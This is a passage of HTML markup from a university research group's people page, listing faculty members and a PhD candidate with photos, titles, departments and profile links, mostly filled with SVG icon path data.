0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c473-outer\">\n            <div data-colibri-id=\"182-c473\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c473 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c474\" class=\"d-block style-973 style-local-182-c474 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/08/hu_new-1.jpg\" class=\"wp-image-1348 style-973-image style-local-182-c474-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c474-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c475\" class=\"h-global-transition-all h-heading style-974 style-local-182-c475 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c475\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Xiaolin Hu</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c476\" class=\"h-text h-text-component style-975 style-local-182-c476 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c477\" class=\"h-text h-text-component style-976 style-local-182-c477 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c478\" class=\"style-977 style-local-182-c478 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://csds.gsu.edu/profile/xiaolin-hu/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=zeU19nAAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c479-outer\">\n            <div data-colibri-id=\"182-c479\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c479 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c480\" class=\"d-block style-973 style-local-182-c480 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Taylor-shelton_300x300.jpeg\" class=\"wp-image-705 style-973-image style-local-182-c480-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c480-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c481\" class=\"h-global-transition-all h-heading style-974 style-local-182-c481 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c481\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Taylor Shelton</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c482\" class=\"h-text h-text-component style-975 style-local-182-c482 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Assistant Professor</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c483\" class=\"h-text h-text-component style-976 style-local-182-c483 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c484\" class=\"style-977 style-local-182-c484 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/taylor-shelton-28a4b3291\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/taylor-shelton/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=WFA1Ry8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c70\" id=\"grads\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-846 style-local-182-c70 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c96\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-860 style-local-182-c96 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-861-outer style-local-182-c97-outer\">\n            <div data-colibri-id=\"182-c97\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-861 style-local-182-c97 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c98\" class=\"h-global-transition-all h-heading style-862 style-local-182-c98 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-862 style-local-182-c98\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Graduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c71\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-847 style-local-182-c71 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c78-outer\">\n            <div data-colibri-id=\"182-c78\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c78 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c79\" class=\"d-block style-854 style-local-182-c79 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Sundos_Al_Subhi-1.jpg\" class=\"wp-image-1592 style-854-image style-local-182-c79-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c79-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c80\" class=\"h-global-transition-all h-heading style-850 style-local-182-c80 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c80\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sundos Al Subhi</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c81\" class=\"h-text h-text-component style-851 style-local-182-c81 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c246\" class=\"h-text h-text-component style-902 style-local-182-c246 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c83\" class=\"style-855 style-local-182-c83 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sundos-al-subhi-88bb97150\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 